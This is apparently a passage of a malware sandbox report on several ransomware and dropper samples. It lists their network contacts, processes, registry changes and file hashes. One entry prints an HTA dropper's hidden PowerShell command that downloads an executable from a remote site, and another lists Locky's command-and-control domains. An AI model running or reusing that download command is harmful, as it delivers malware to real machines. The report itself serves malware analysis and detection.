DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 dist.torproject.org udp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 dist.torproject.org tcp
DE 116.202.120.166:443 tcp
DE 116.202.120.166:443 tcp
DE 116.202.120.166:443 tcp

Files

memory/1700-0-0x000007FEF54DE000-0x000007FEF54DF000-memory.dmp

memory/1700-2-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/1700-1-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/1700-3-0x000000001ADD0000-0x000000001AE22000-memory.dmp

memory/1700-4-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/1700-10-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/1700-11-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/1700-12-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/1700-13-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/1700-14-0x000007FEF54DE000-0x000007FEF54DF000-memory.dmp

memory/1700-15-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/1700-16-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/1700-17-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 6a0e30ffa8311f0f499c0963dbd25138
SHA1 e8ab85c0a943f6b59775a343374cd7c22d3769df
SHA256 1f88fc18b9ee5672baf95815c344320a079727c47c5c67052c8052459e693b0c
SHA512 a2a223a76c907c1bcb95512c69c1618f534382a4ae4397d5b399afbca8b7004424fbf67331af7ccca0fd3f833c860e959983bf074c952205db7326a235193816

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20241010-en

Max time kernel

141s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Signatures

Locky

ransomware locky

Locky family

locky

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Locky.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Locky.exe

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 embavssrrfvukl.in udp
US 8.8.8.8:53 rcbquc.ru udp
US 8.8.8.8:53 frxdrjrjd.de udp
US 8.8.8.8:53 weaaspoo.in udp
US 8.8.8.8:53 ktwmpwuncbi.fr udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
IE 86.104.134.144:80 tcp
IE 86.104.134.144:80 tcp
IE 86.104.134.144:80 tcp

Files

memory/2324-0-0x0000000000220000-0x0000000000224000-memory.dmp

memory/2324-1-0x0000000000220000-0x0000000000224000-memory.dmp

memory/2324-2-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2324-4-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2324-5-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2324-8-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2324-10-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2324-11-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2324-13-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/2324-14-0x0000000000400000-0x00000000007D1000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\131.exe

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\54387.exe');

Network

Country Destination Domain Proto
US 8.8.8.8:53 french-cooking.com udp
FR 54.36.91.62:80 french-cooking.com tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 848 -ip 848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 484

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 104.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 74.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

137s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 98.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 f66cd03d77192307267b68ba42da048e
SHA1 ec4331eb82e16e8ba602180e73c2363fad393da5
SHA256 f84519f3b4f5359447963a94cf30e9d08b73fac5815adaef253ca0e61047301c
SHA512 d55c4cfb630ac0f6bcd1613bd4e1d6cbf4cc54e6348f4cb57819312973127eaf0701758fef3cc3492839f41d0031e5a4123e26e68ac42c247dfc7e2e0d2a24b0

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20240903-en

Max time kernel

131s

